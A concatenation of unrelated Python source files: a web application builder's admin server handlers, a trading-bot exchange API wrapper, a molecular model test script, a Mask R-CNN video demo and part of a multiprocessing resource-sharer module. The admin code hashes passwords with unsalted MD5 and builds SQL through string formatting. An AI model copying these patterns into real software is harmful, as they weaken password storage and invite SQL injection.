return items
def get_system_fields(item):
result = []
atts = ['f_primary_key', 'f_deleted_flag', 'f_master_id', 'f_master_rec_id']
for at in atts:
field = item.field_by_name(at)
if field.value:
result.append(field.value)
if result:
fields = item.task.sys_fields.copy()
fields.set_where(id__in=result)
fields.open()
result = []
for f in fields:
result.append(f.f_field_name.value)
return result
def update_interface(delta, type_id, item_id):
def delete_id_from_list(id_list, id_value):
return [id_it for id_it in id_list if id_it[0] != id_value]
task = delta.task
if type_id in (common.ITEM_TYPE, common.TABLE_TYPE) and \
delta.details.sys_fields.record_count():
item = task.sys_items.copy()
item.filters.id.value = item_id
item.open()
system_fields = get_system_fields(item)
fields = task.sys_fields.copy()
fields.filters.owner_rec_id.value = [item_id, item.parent.value]
fields.open()
common.load_interface(item)
if delta.record_status == common.RECORD_INSERTED:
for field in fields:
if field.owner_rec_id.value == item.parent.value:
if not field.f_field_name.value in system_fields:
if type(item._view_list) is list:
item._view_list.append([field.id.value, False, False, False])
if type(item._edit_list) is list:
item._edit_list.append([field.id.value])
for d in delta.details.sys_fields:
if d.record_status in [common.RECORD_INSERTED, common.RECORD_DELETED]:
field_name = d.f_field_name.value
if fields.locate('f_field_name', field_name):
if d.record_status == common.RECORD_INSERTED:
if not field_name in system_fields:
if type(item._view_list) is list:
item._view_list.append([fields.id.value, False, False, False])
if type(item._edit_list) is list:
item._edit_list.append([fields.id.value])
elif d.record_status == common.RECORD_DELETED:
if type(item._view_list) is list:
item._view_list = delete_id_from_list(item._view_list, fields.id.value)
if type(item._edit_list) is list:
item._edit_list = delete_id_from_list(item._edit_list, fields.id.value)
item._order_list = delete_id_from_list(item._order_list, fields.id.value)
common.store_interface(item)
def change_item_sql(item, old_fields, new_fields):
db_type = get_db_type(item.task)
return item.change_table_sql(db_type, old_fields, new_fields)
def update_table(delta):
if delta.f_virtual_table.value or \
delta.type_id.value in (common.ITEMS_TYPE, common.TABLES_TYPE, common.REPORTS_TYPE):
return False
else:
return True
def init_priviliges(item, item_id):
item.task.execute('DELETE FROM SYS_PRIVILEGES WHERE ITEM_ID = %s' % item_id)
priv = item.task.sys_privileges.copy(handlers=False)
priv.open(open_empty=True)
roles = item.task.sys_roles.copy(handlers=False)
roles.open()
for r in roles:
priv.append()
priv.owner_id.value = r.ID
priv.owner_rec_id.value = r.id.value
priv.item_id.value = item_id
priv.f_can_view.value = True
priv.f_can_create.value = True
priv.f_can_edit.value = True
priv.f_can_delete.value = True
priv.post()
priv.apply()
def items_insert_sql(item, delta, manual_update=False, new_fields=None, foreign_fields=None):
if update_table(delta) and not manual_update:
if delta.type_id.value in (common.ITEM_TYPE, common.TABLE_TYPE):
db_type = get_db_type(item.task)
fields = new_fields
if not fields:
fields = get_table_fields(delta, delta.details.sys_fields)
sql = delta.create_table_sql(db_type, delta.f_table_name.value, \
fields, delta.f_gen_name.value, foreign_fields=foreign_fields)
return sql
def items_execute_insert(item, delta, manual_update):
sql = items_insert_sql(item, delta, manual_update)
if sql:
error = execute(item.task, delta.task_id.value, sql)
if error:
raise Exception(item.task.language('error_creating_table') % (error))
sql = delta.apply_sql()
result = item.task.execute(sql)
exec_result = result[0]
result_id = exec_result['changes'][0]['rec_id']
init_priviliges(item, result_id)
update_interface(delta, delta.type_id.value, result_id)
return result
def items_update_sql(item, delta, manual_update=False):
if update_table(delta) and not manual_update:
if delta.type_id.value in (common.ITEMS_TYPE, common.TABLES_TYPE,
common.ITEM_TYPE, common.TABLE_TYPE) and \
delta.details.sys_fields.record_count():
it = item.copy()
it.filters.id.value = delta.id.value
it.open()
it_fields = it.details.sys_fields
it_fields.open()
old_fields = get_table_fields(delta, it_fields)
new_fields = get_table_fields(delta, it_fields, delta.details.sys_fields)
sql = change_item_sql(delta, old_fields, new_fields)
return sql
def items_execute_update(item, delta, manual_update):
sql = items_update_sql(item, delta, manual_update)
if sql:
error = execute(item.task, delta.task_id.value, sql)
if error:
raise Exception(item.task.language('error_modifying_table') % error)
sql = delta.apply_sql()
result = item.task.execute(sql)
update_interface(delta, delta.type_id.value, delta.id.value)
return result
def items_delete_sql(item, delta, manual_update=False):
if update_table(delta) and not manual_update:
if delta.type_id.value in (common.ITEM_TYPE, common.TABLE_TYPE):
db_type = get_db_type(item.task)
sql = delta.delete_table_sql(db_type)
return sql
def sys_item_deleted_sql(delta):
result = []
sys_params = delta.task.sys_params.copy()
sys_params.open()
if delta.id.value == sys_params.f_history_item.value:
result.append('UPDATE SYS_PARAMS SET F_HISTORY_ITEM=NULL')
if delta.id.value == sys_params.f_lock_item.value:
result.append('UPDATE SYS_PARAMS SET F_LOCK_ITEM=NULL')
if delta.id.value == sys_params.f_sys_group.value:
result.append('UPDATE SYS_PARAMS SET F_SYS_GROUP=NULL')
return result
def items_execute_delete(item, delta, manual_update):
sql = items_delete_sql(item, delta, manual_update)
if sql:
error = execute(item.task, delta.task_id.value, sql)
if error:
raise Exception(item.task.language('error_deleting_table') % (delta.table_name.upper(), error))
commands = []
sql = delta.apply_sql()
commands.append(sql)
for it in (item.task.sys_filters, item.task.sys_indices, item.task.sys_report_params):
commands.append('DELETE FROM %s WHERE OWNER_REC_ID = %s' % (it.table_name.upper(), delta.id.value))
commands = commands + sys_item_deleted_sql(delta)
result = item.task.execute(commands)
return result
def items_apply_changes(item, delta, params):
manual_update = params['manual_update']
for f in delta.sys_fields:
if not f.id.value:
raise Exception(item.task.language('field_no_id') % (f.field_name))
if delta.rec_inserted():
result = items_execute_insert(item, delta, manual_update)
elif delta.rec_modified():
result = items_execute_update(item, delta, manual_update)
elif delta.rec_deleted():
result = items_execute_delete(item, delta, manual_update)
item.task.app.task_server_modified = True
roles_changed(item)
return result
def do_on_apply_changes(item, delta, params):
sql = delta.apply_sql()
result = item.task.execute(sql)
item.task.app.task_server_modified = True
return result
def server_group_is_empty(item, id_value):
item = item.task.sys_items.copy()
item.set_where(parent=id_value)
item.open()
return item.record_count() == 0
def server_can_delete(item, id_value):
item = item.copy()
item.set_where(id=id_value)
item.open()
details = item.task.sys_items.copy()
details.filters.table_id.value = id_value
details.open()
used = []
for d in details:
used.append({'item1': item.task.sys_items.field_by_id(d.parent.value, 'f_item_name'), 'item2': d.f_item_name.value})
if len(used) != 0:
names = ',<br>'.join(['<b>%(item1)s</b> - <b>%(item2)s</b>' % use for use in used])
mess = item.task.language('item_used_in_items') % {'item': item.f_item_name.value, 'items': names}
return mess
fields = item.task.sys_fields.copy()
fields.open()
used = []
for f in fields:
if f.f_object.value == id_value:
used.append({'field1': item.task.sys_items.field_by_id(f.owner_rec_id.value, 'f_item_name'), 'field2': f.f_field_name.value})
if len(used) != 0:
names = ',<br>'.join(['<b>%(field1)s</b> - <b>%(field2)s</b>' % use for use in used])
mess = item.task.language('item_used_in_fields') % {'item': item.f_item_name.value, 'fields': names}
return mess
params = item.task.sys_report_params.copy()
params.open()
used = []
for p in params:
if p.f_object.value == id_value:
used.append({'param1': item.task.sys_items.field_by_id(p.owner_rec_id.value, 'f_item_name'), 'param2': p.f_param_name.value})
if len(used) != 0:
names = ',<br>'.join(['<b>%(param1)s</b> - <b>%(param2)s</b>' % use for use in used])
mess = item.task.language('item_used_in_params') % {'item': item.f_item_name.value, 'params': names}
return mess
details = item.task.sys_items.copy()
details.set_filters(parent=id_value)
details.open()
if details.record_count():
mess = "Can't delete item: item contains details"
return mess
def server_load_interface(item, id_value):
item = item.copy()
item.set_where(id=id_value)
item.open(fields=['id', 'f_info'])
common.load_interface(item)
return {
'view_list': item._view_list,
'edit_list': item._edit_list,
'order_list': item._order_list,
'reports_list': item._reports_list
}
def server_store_interface(item, id_value, info):
item = item.copy()
item.set_where(id=id_value)
item.open(fields=['id', 'f_info'])
item._view_list = info['view_list']
item._edit_list = info['edit_list']
item._order_list = info['order_list']
item._reports_list = info['reports_list']
common.store_interface(item)
item.task.app.task_server_modified = True
def create_detail_index(task, table_id):
items = task.sys_items.copy()
items.set_where(type_id=common.TASK_TYPE)
items.open(fields = ['id', 'type_id', 'f_item_name'])
task_id = items.id.value
task_name = items.f_item_name.value
tables = task.sys_items.copy(handlers=False)
tables.set_where(id=table_id)
tables.open()
if not tables.f_master_id.value:
return
found = False
indexes = task.sys_indices.copy(handlers=False)
indexes.set_where(owner_rec_id=table_id)
indexes.open()
for i in indexes:
if not i.f_foreign_index.value:
field_list = common.load_index_fields(i.f_fields_list.value)
if len(field_list) >= 2 and \
field_list[0][0] == tables.f_master_id.value and \
field_list[1][0] == tables.f_master_rec_id.value:
found = True
if not found:
dest_list = [[tables.f_master_id.value, False], [tables.f_master_rec_id.value, False]]
indexes.append()
index_name = task_name.upper() + '_' + tables.f_item_name.value.upper()
if len(index_name) > 20:
index_name = index_name[0:20]
indexes.f_index_name.value = index_name + '_DETAIL_' + 'IDX';
indexes.task_id.value = task_id
indexes.owner_rec_id.value = table_id
indexes.f_foreign_index.value = False
indexes.f_fields_list.value = server_dump_index_fields(indexes, dest_list)
indexes.post()
indexes.on_apply = indices_apply_changes
indexes.apply(params={'manual_update': False})
def server_update_details(item, item_id, dest_list):
def get_table_info(table_id):
items = item.copy()
items.set_where(id=table_id)
items.open()
return items.f_name.value, items.f_item_name.value, items.f_table_name.value
def convert_details(i_list, attr, detail_list):
try:
for media, options in iteritems(i_list):
try:
new = []
details = options[1].get(attr)
if details:
for d in detail_list:
if d in details:
new.append(d)
options[1][attr] = new
except:
pass
except:
pass
return i_list
detail_list = [d[0] for d in dest_list]
items = item.copy(handlers=False)
items.set_where(parent=item_id)
items.open()
while not items.eof():
cur_row = [row for row in dest_list if row[0] == items.table_id.value]
if len(cur_row) == 1:
dest_list.remove(cur_row[0])
items.next()
else:
items.delete()
items.apply()
item = item.copy(handlers=False)
item.set_where(id=item_id)
item.open()
for row in dest_list:
table_id = row[0]
name, obj_name, table_name = get_table_info(table_id)
items.append()
items.task_id.value = item.task_id.value
items.type_id.value = common.DETAIL_TYPE
items.table_id.value = table_id
items.parent.value = item.id.value
items.f_name.value = name
items.f_item_name.value = obj_name
items.f_table_name.value = table_name
items.f_visible.value = True
items.f_info.value = ''
items.post()
table = item.task.sys_items.copy()
table.set_where(id=table_id)
table.open()
common.load_interface(table)
items._view_list = table._view_list
items._edit_list = table._edit_list
items._order_list = table._order_list
items._reports_list = []
common.store_interface(items)
items.apply()
init_priviliges(items, items.id.value)
try:
create_detail_index(items.task, table_id)
except Exception as e:
traceback.print_exc()
item.task.app.task_server_modified = True
items.set_order_by(['f_index'])
items.set_where(parent=item_id)
items.open()
for it in items:
cur_row = [i for i, row in enumerate(detail_list) if row == items.table_id.value]
if len(cur_row) == 1:
it.edit()
it.f_index.value = cur_row[0]
it.post()
items.apply()
items.set_order_by(['f_index'])
items.set_where(parent=item_id)
items.open()
detail_list = []
for it in items:
detail_list.append(it.id.value)
common.load_interface(item)
item._view_list = convert_details(item._view_list, 'view_detail', detail_list)
item._edit_list = convert_details(item._edit_list, 'edit_details', detail_list)
common.store_interface(item)
###############################################################################
# sys_fields #
###############################################################################
def server_can_delete_field(item, id_value):
item = item.copy()
item.set_where(id=id_value)
item.open()
item_type_id = item.task.sys_items.field_by_id(item.owner_rec_id.value, 'type_id')
if item_type_id in (common.ITEMS_TYPE, common.TABLES_TYPE):
if not server_group_is_empty(item, item.owner_rec_id.value):
mess = "Can't delete the field: the group contains items."
return mess
field_id = item.id.value
fields = item.task.sys_fields.copy()
fields.set_filters(task_id=item.task_id.value)
fields.open()
used = []
for f in fields:
if f.f_object_field.value == field_id:
used.append((item.task.sys_items.field_by_id(f.owner_rec_id.value, 'f_item_name'),
f.f_field_name.value))
if len(used) != 0:
names = ',<br>'.join(['<p>%s - %s</p>' % use for use in used])
mess = item.task.language('field_used_in_fields') % \
{'field': item.f_field_name.value, 'fields': names}
return mess
field_id = item.id.value
indices = item.task.sys_indices.copy()
indices.filters.owner_rec_id.value = item.owner_rec_id.value
indices.open()
ind_list = []
for ind in indices:
if ind.f_foreign_index.value:
if ind.f_foreign_field.value == field_id:
ind_list.append(ind.f_index_name.value)
else:
field_list = common.load_index_fields(ind.f_fields_list.value)
for fld in field_list:
if fld[0] == field_id:
ind_list.append(ind.f_index_name.value)
if len(ind_list):
names = ',<br>'.join(ind_list)
mess = item.task.language('field_used_in_indices') % \
{'field': item.f_field_name.value, 'indexes': names}
return mess
field_id = item.id.value
filters = item.task.sys_filters.copy()
filters.filters.owner_rec_id.value = item.owner_rec_id.value
filters.open()
filters_list = []
for fltr in filters:
if fltr.f_field.value == field_id:
filters_list.append(fltr.f_filter_name.value)
if len(filters_list):
names = ',<br>'.join(filters_list)
mess = item.task.language('field_used_in_filters') % \
{'field': item.f_field_name.value, 'filters': names}
return mess
###############################################################################
# sys_indices #
###############################################################################
def update_index(delta):
it = delta.task.sys_items.copy()
it.set_where(id=delta.owner_rec_id.value)
it.open()
if it.record_count():
return not it.f_virtual_table.value
else:
return True
def change_foreign_index(delta):
items = delta.task.sys_items.copy()
items.filters.id.value = delta.owner_rec_id.value
items.open()
it_fields = items.details.sys_fields
it_fields.open()
fields = get_table_fields(items, it_fields)
new_fields = list(fields)
return items.recreate_table_sql(db_modules.SQLITE, fields, new_fields, delta)
def indices_insert_sql(item, delta, table_name=None, new_fields=None, manual_update=False, foreign_key_dict=None):
if not manual_update and update_index(delta):
if not table_name:
table_name = delta.task.sys_items.field_by_id(delta.owner_rec_id.value, 'f_table_name')
db_type = get_db_type(item.task)
if db_type == db_modules.SQLITE and delta.f_foreign_index.value:
if not new_fields:
return change_foreign_index(delta)
else:
return delta.create_index_sql(db_type, table_name, new_fields=new_fields, foreign_key_dict=foreign_key_dict)
def indices_execute_insert(item, delta, manual_update):
sql = indices_insert_sql(item, delta, manual_update=manual_update)
if sql:
error = execute(item.task, delta.task_id.value, sql)
if error:
raise Exception(item.task.language('error_creating_index') % (delta.f_index_name.value.upper(), error))
sql = delta.apply_sql()
return item.task.execute(sql)
def indices_delete_sql(item, delta, manual_update=False):
if not manual_update and update_index(delta):
db_type = get_db_type(item.task)
if db_type == db_modules.SQLITE and delta.f_foreign_index.value:
return change_foreign_index(delta)
else:
return delta.delete_index_sql(db_type)
def indices_execute_delete(item, delta, manual_update):
sql = indices_delete_sql(item, delta, manual_update)
if sql:
error = execute(item.task, delta.task_id.value, sql)
if error:
raise Exception(item.task.language('error_deleting_index') % error)
sql = delta.apply_sql()
return item.task.execute(sql)
def indices_apply_changes(item, delta, params):
manual_update = params['manual_update']
table_name = item.task.sys_items.field_by_id(delta.owner_rec_id.value, 'f_table_name')
if table_name:
if delta.rec_inserted():
result = indices_execute_insert(item, delta, manual_update)
elif delta.rec_deleted():
result = indices_execute_delete(item, delta, manual_update)
return result
def server_dump_index_fields(item, dest_list):
return common.store_index_fields(dest_list)
def server_load_index_fields(item, value):
return common.load_index_fields(value)
###############################################################################
# sys_roles #
###############################################################################
def users_on_apply(item, delta, params):
for d in delta:
d.edit()
d.f_psw_hash.value = hashlib.md5(d.f_password.value.encode("utf8")).hexdigest()
#~ d.f_psw_hash.value = hashlib.md5(d.f_password.value).hexdigest()
d.post()
def privileges_table_get_select(item, query):
owner_id = query['__master_id']
owner_rec_id = query['__master_rec_id']
result_sql = \
"""
SELECT P.ID, P.DELETED, P.OWNER_ID,
P.OWNER_REC_ID,
I.ID,
O.F_NAME,
P.F_CAN_VIEW,
P.F_CAN_CREATE,
P.F_CAN_EDIT,
P.F_CAN_DELETE,
I.F_NAME AS ITEM_ID_LOOKUP
FROM (SYS_ITEMS AS I
LEFT JOIN SYS_ITEMS AS O ON O.ID = I.PARENT
LEFT JOIN SYS_PRIVILEGES AS P ON P.ITEM_ID = I.ID AND P.DELETED = 0 and P.OWNER_ID = %s AND P.OWNER_REC_ID = %s)
WHERE I.DELETED = 0 AND I.TYPE_ID >= 10
ORDER BY O.F_NAME
"""
result_sql = result_sql % (owner_id, owner_rec_id)
error_mes = ''
try:
rows = item.task.select(result_sql)
except Exception as e:
error_mes = error_message(e)
return rows, error_mes
def roles_changed(item):
item.task.app.privileges = None
def privileges_open(item, params):
item_id = params['item_id']
result_sql = \
"""
SELECT p.ID,
p.DELETED,
%s AS OWNER_ID,
r.ID AS OWNER_REC_ID,
%s AS ITEM_ID,
"" AS OWNER_ITEM,
p."F_CAN_VIEW",
p."F_CAN_CREATE",
p."F_CAN_EDIT",
p."F_CAN_DELETE",
r."F_NAME" AS "ITEM_ID_LOOKUP"
FROM (SYS_ROLES AS r LEFT JOIN "SYS_PRIVILEGES" AS p ON p."OWNER_REC_ID" = r."ID" AND
p."DELETED" = 0 AND ITEM_ID = %s)
WHERE r."DELETED" = 0
ORDER BY "ITEM_ID_LOOKUP"
"""
result_sql = result_sql % (item.task.sys_roles.ID, item_id, item_id)
error_mes = ''
try:
rows = item.task.select(result_sql)
except Exception as e:
error_mes = error_message(e)
return rows, error_mes
###############################################################################
# sys_langs #
###############################################################################
def add_lang(item, lang_id, language, country, name, abr, rtl, copy_lang):
langs.add_lang(item.task, lang_id, language, country, name, abr, rtl, copy_lang)
def save_lang_field(item, lang_id, field_name, value):
langs.save_lang_field(item.task, lang_id, field_name, value)
def get_lang_translation(item, lang1, lang2):
return langs.get_lang_translation(item.task, lang1, lang2)
def save_lang_translation(item, lang_id, key_id, value):
langs.save_lang_translation(item.task, lang_id, key_id, value)
def add_key(item, key):
return langs.add_key(item.task, key)
def del_key(item, key_id):
return langs.del_key(item.task, key_id)
def export_lang(item, lang_id, host):
return langs.export_lang(item.task, lang_id, host)
def import_lang(item, file_path):
return langs.import_lang(item.task, os.path.join(item.task.work_dir, file_path))
def register_events(task):
task.register(server_check_connection)
task.register(server_set_task_name)
task.register(server_set_project_langage)
# ~ task.register(server_change_secret_key)
task.register(server_update_has_children)
task.register(server_export_task)
task.register(server_import_task)
task.register(server_find_in_task)
task.register(server_web_print_code)
task.register(server_item_info)
task.register(server_get_task_dict)
task.register(server_save_edit)
task.register(server_file_info)
task.register(server_save_file)
task.register(get_fields_next_id)
task.register(get_lookup_list)
task.register(server_get_db_options)
task.register(server_create_task)
task.register(server_get_table_names)
task.register(server_import_table)
task.register(server_get_task_info)
task.register(server_can_delete_lookup_list)
task.register(server_valid_item_name)
task.register(server_get_primary_key_type)
task.register(server_set_literal_case)
task.register(get_new_table_name)
task.register(create_system_item)
task.register(create_detail_index)
task.sys_params.on_apply = do_on_apply_param_changes
task.sys_users.on_apply = users_on_apply
task.sys_tasks.on_apply = do_on_apply_param_changes
task.sys_items.register(server_can_delete)
task.sys_items.register(server_group_is_empty)
task.sys_items.register(server_load_interface)
task.sys_items.register(server_store_interface)
task.sys_items.register(server_update_details)
task.sys_items.on_apply = items_apply_changes
task.sys_fields.register(server_can_delete_field)
task.sys_filters.on_apply = do_on_apply_changes
task.sys_report_params.on_apply = do_on_apply_changes
task.sys_indices.on_apply = indices_apply_changes
task.sys_indices.register(server_dump_index_fields)
task.sys_indices.register(server_load_index_fields)
task.role_privileges.on_open = privileges_table_get_select
task.sys_privileges.on_open = privileges_open
task.sys_roles.register(roles_changed)
task.sys_langs.register(get_lang_translation)
task.sys_langs.register(save_lang_field)
task.sys_langs.register(save_lang_translation)
task.sys_langs.register(add_lang)
task.sys_langs.register(add_key)
task.sys_langs.register(del_key)
task.sys_langs.register(export_lang)
task.sys_langs.register(import_lang)
|
api.py | import threading
import jesse.helpers as jh
from jesse.models import Order
class API:
def __init__(self) -> None:
self.drivers = {}
if not jh.is_live():
self.initiate_drivers()
def initiate_drivers(self) -> None:
for e in jh.get_config('app.considering_exchanges'):
if jh.is_live():
def initiate_ws(exchange_name: str) -> None:
from jesse_live.info import SUPPORTED_EXCHANGES, SUPPORTED_EXCHANGES_NAMES
exchange_class = jh.get_config(f'app.live_drivers.{exchange_name}')
if exchange_name not in SUPPORTED_EXCHANGES_NAMES:
exchange_names = ''
for se in SUPPORTED_EXCHANGES:
exchange_names += f'\n "{se["name"]}"'
error_msg = f'Driver for "{exchange_name}" is not supported yet. Supported exchanges are: {exchange_names}'
jh.error(error_msg, force_print=True)
jh.terminate_app()
self.drivers[exchange_name] = exchange_class()
threading.Thread(target=initiate_ws, args=[e]).start()
else:
from jesse.exchanges import Sandbox
self.drivers[e] = Sandbox(e)
def market_order(self, exchange: str, symbol: str, qty: float, current_price: float, side: str, role: str,
flags: str) -> Order:
return self.drivers[exchange].market_order(symbol, qty, current_price, side, role, flags)
def limit_order(self, exchange: str, symbol: str, qty: float, price: float, side: str, role: str,
flags: str) -> Order:
return self.drivers[exchange].limit_order(symbol, qty, price, side, role, flags)
def stop_order(self, exchange: str, symbol: str, qty: float, price: float, side: str, role: str,
flags: str) -> Order:
return self.drivers[exchange].stop_order(symbol, qty, price, side, role, flags)
def cancel_all_orders(self, exchange: str, symbol: str) -> bool:
return self.drivers[exchange].cancel_all_orders(symbol)
def cancel_order(self, exchange: str, symbol: str, order_id: str) -> bool:
return self.drivers[exchange].cancel_order(symbol, order_id)
api = API()
|
test.py | import sys
sys.path.append("/scratch/wdjo224/deep_protein_binding")
import torch
torch.manual_seed(0)
import os
import time
import pandas as pd
import numpy as np
from tqdm import tqdm
from itertools import chain
from torch.utils.data.sampler import SubsetRandomSampler
from torch.utils.data import DataLoader
from src.model import MPNN
from src.MoleculeDataset import MoleculeDatasetCSV
from src.utils import collate_fn, get_loss, get_parser
#TODO: output feature vectors
#TODO: set variables as volatile=true
debug = False
args = get_parser().parse_args()
test_idxs = np.array_split(np.fromfile(args.test_idxs, dtype=np.int), args.n_test_process)
output_path = "/scratch/wdjo224/deep_protein_binding/experiments/" + args.exp_name + "/test_results/{}".format(args.pid)
def test(rank, model):
idxs = test_idxs[rank]
print("pid: {}".format(os.getpid()))
result_summary = None
molecules = MoleculeDatasetCSV(
csv_file=args.D,
corrupt_path=args.c, target=args.target, scaling=args.scale)
loss_fn = get_loss(args)
start_time = time.clock()
for idx in idxs:
molecule_loader = DataLoader(molecules, batch_size=1, sampler=SubsetRandomSampler([idx]),
collate_fn=collate_fn, num_workers=0)
for batch in molecule_loader:
val_dict = model.validation_step(batch=batch, loss_fn=loss_fn)
result_summary = pd.concat([result_summary, pd.DataFrame(({"idx": idx,
"loss": val_dict["batch_dict"][key]["loss"][0],
"pred": val_dict["batch_dict"][key]["pred"][0],
"true": val_dict["batch_dict"][key]["true"][0]}
for key in val_dict["batch_dict"].keys()), index=[0])],
axis=0)
if debug == True:
break
end_time = time.clock()
print("evaluation finished in {} cpu seconds. writing results...".format((end_time-start_time)))
# convert the pred and true columns to numpy objects...have some messy shapes/etc so clean this up here
result_summary.pred = result_summary.pred.apply(lambda x: x.data.numpy())
result_summary.true = result_summary.true.apply(lambda x: x.data.numpy())
result_summary = result_summary.reset_index()
if debug == True:
print(result_summary.head())
else:
result_summary.to_csv(output_path+"/test_results_{}.csv".format(rank))
def main():
print("{:=^100}".format(' Test '))
print("run parameters: {}".format(sys.argv))
import torch.multiprocessing as mp
mp.set_sharing_strategy("file_system") #is this necessary?ss
# if output path does not exist, create it
if not os.path.exists(output_path):
os.makedirs(output_path)
model = MPNN(T=args.T, p=args.p, target=args.target, output_type=args.output_type, output_dim=args.output_dim,
readout_dim=args.readout_dim)
model.load_state_dict(torch.load(args.model_path))
model.eval()
processes = []
for rank in range(args.n_test_process):
p = mp.Process(target=test, args=(rank, model))
p.start()
processes.append(p)
print("joining {} processes.".format(len(processes)))
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
demoMp4.py | import os
import sys
import random
import math
import numpy as np
import skimage.io
import matplotlib
import matplotlib.pyplot as plt
from multiprocessing import Process,Queue
# import coco
from coco import coco
# import utils
from mrcnn import utils
from mrcnn import model as modellib
import cv2
import colorsys
ROOT_DIR = os.getcwd()
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
COCO_MODEL_PATH = os.path.join(ROOT_DIR, "../mask_rcnn_coco.h5")
if not os.path.exists(COCO_MODEL_PATH):
utils.download_trained_weights(COCO_MODEL_PATH)
IMAGES_BATCH = 21
class InferenceConfig(coco.CocoConfig):
GPU_COUNT = 1
# IMAGES_PER_GPU = 1
IMAGES_PER_GPU = IMAGES_BATCH
config = InferenceConfig()
model = modellib.MaskRCNN(mode="inference", model_dir=MODEL_DIR, config=config)
model.load_weights(COCO_MODEL_PATH, by_name=True)
class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
cap = cv2.VideoCapture("test.mp4")
#cap = cv2.VideoCapture(0)
# height = 720
# width = 1280
# height = 800
# width = 800
# height = 360
# width = 640
# height = 180
# width = 320
height = 600
width = 600
def random_colors(N, bright=True):
brightness = 1.0 if bright else 0.7
hsv = [(i / N, 1, brightness) for i in range(N)]
colors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv))
random.shuffle(colors)
return colors
def apply_mask(image, mask, color, alpha=0.5):
for c in range(3):
image[:, :, c] = np.where(mask == 1,
image[:, :, c] *
(1 - alpha) + alpha * color[c] * 255,
image[:, :, c])
return image
def display_instances(image, boxes, masks, class_ids, class_names,
scores=None, title="",
figsize=(16, 16), ax=None):
N = boxes.shape[0]
if not N:
print("\n*** No instances to display *** \n")
else:
assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]
colors = random_colors(N)
masked_image = image.copy()
for i in range(N):
color = colors[i]
# Bounding box
if not np.any(boxes[i]):
continue
y1, x1, y2, x2 = boxes[i]
camera_color = (color[0] * 255, color[1] * 255, color[2] * 255)
cv2.rectangle(masked_image, (x1, y1), (x2, y2), camera_color , 1)
# Label
class_id = class_ids[i]
score = scores[i] if scores is not None else None
label = class_names[class_id]
x = random.randint(x1, (x1 + x2) // 2)
caption = "{} {:.3f}".format(label, score) if score else label
camera_font = cv2.FONT_HERSHEY_PLAIN
cv2.putText(masked_image,caption,(x1, y1),camera_font, 1, camera_color)
# Mask
mask = masks[:, :, i]
masked_image = apply_mask(masked_image, mask, color)
return masked_image.astype(np.uint8)
def putImages(q):
while(True):
for i in range(IMAGES_BATCH):
# 動画ストリームからフレームを取得
ret, frame = cap.read()
# カメラ画像をリサイズ
image_cv2 = cv2.resize(frame,(width,height))
if i == 0:
images = np.array([image_cv2])
else:
images = np.append(images,[image_cv2],axis=0)
q.put(images)
def main():
# FPS 測定
tm = cv2.TickMeter()
tm.start()
count = 0
max_count = IMAGES_BATCH * 2
fps = 0
while(True):
# for i in range(IMAGES_BATCH):
# # 動画ストリームからフレームを取得
# ret, frame = cap.read()
# # カメラ画像をリサイズ
# image_cv2 = cv2.resize(frame,(width,height))
# if i == 0:
# images = np.array([image_cv2])
# else:
# images = np.append(images,[image_cv2],axis=0)
Q = Queue()
P = Process(target=putImages,args=(Q,))
P.start()
images = Q.get()
print(len(images))
P.join()
tm.reset()
tm.start()
# t1 = tm.getTimeSec()
results = model.detect(images)
# FPS 測定
# if count == max_count:
# tm.stop()
# fps = max_count / tm.getTimeSec()
# tm.reset()
# tm.start()
# count = 0
# print('fps: {:.2f}'.format(fps))
tm.stop()
# t2 = tm.getTimeSec()
# print(t2-t1)
fps = len(results) / tm.getTimeSec()
# tm.reset()
# tm.start()
count = 0
print('fps: {:.2f}'.format(fps))
cv2.putText(frame, 'FPS: {:.2f}'.format(fps),(10,30),
cv2.FONT_HERSHEY_SIMPLEX,1.0,(0,255,0),thickness=2)
for i in range(IMAGES_BATCH):
r = results[i]
camera = display_instances(images[i], r['rois'], r['masks'], r['class_ids'],
class_names, r['scores'])
cv2.imshow("camera window", camera)
count += 1
# print(i)
# escを押したら終了。
if cv2.waitKey(1) == 27:
break
#終了
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
main() |
resource_sharer.py | #
# We use a background thread for sharing fds on Unix, and for sharing sockets on
# Windows.
#
# A client which wants to pickle a resource registers it with the resource
# sharer and gets an identifier in return. The unpickling process will connect
# to the resource sharer, sends the identifier and its pid, and then receives
# the resource.
#
import os
import signal
import socket
import sys
import threading
from . import process
from .context import reduction
from . import util
__all__ = ['stop']
if sys.platform == 'win32':
__all__ += ['DupSocket']
class DupSocket(object):
'''Picklable wrapper for a socket.'''
def __init__(self, sock):
new_sock = sock.dup()
def send(conn, pid):
share = new_sock.share(pid)
conn.send_bytes(share)
self._id = _resource_sharer.register(send, new_sock.close)
def detach(self):
'''Get the socket. This should only be called once.'''
with _resource_sharer.get_connection(self._id) as conn:
share = conn.recv_bytes()
return socket.fromshare(share)
else:
__all__ += ['DupFd']
class DupFd(object):
'''Wrapper for fd which can be used at any time.'''
def __init__(self, fd):
new_fd = os.dup(fd)
def send(conn, pid):
reduction.send_handle(conn, new_fd, pid)
def close():
os.close(new_fd)
self._id = _resource_sharer.register(send, close)
def detach(self):
'''Get the fd. This should only be called once.'''
with _resource_sharer.get_connection(self._id) as conn:
return reduction.recv_handle(conn)
class _ResourceSharer(object):
'''Manager for resources using background thread.'''
def __init__(self):
self._key = 0
self._cache = {}
self._old_locks = []
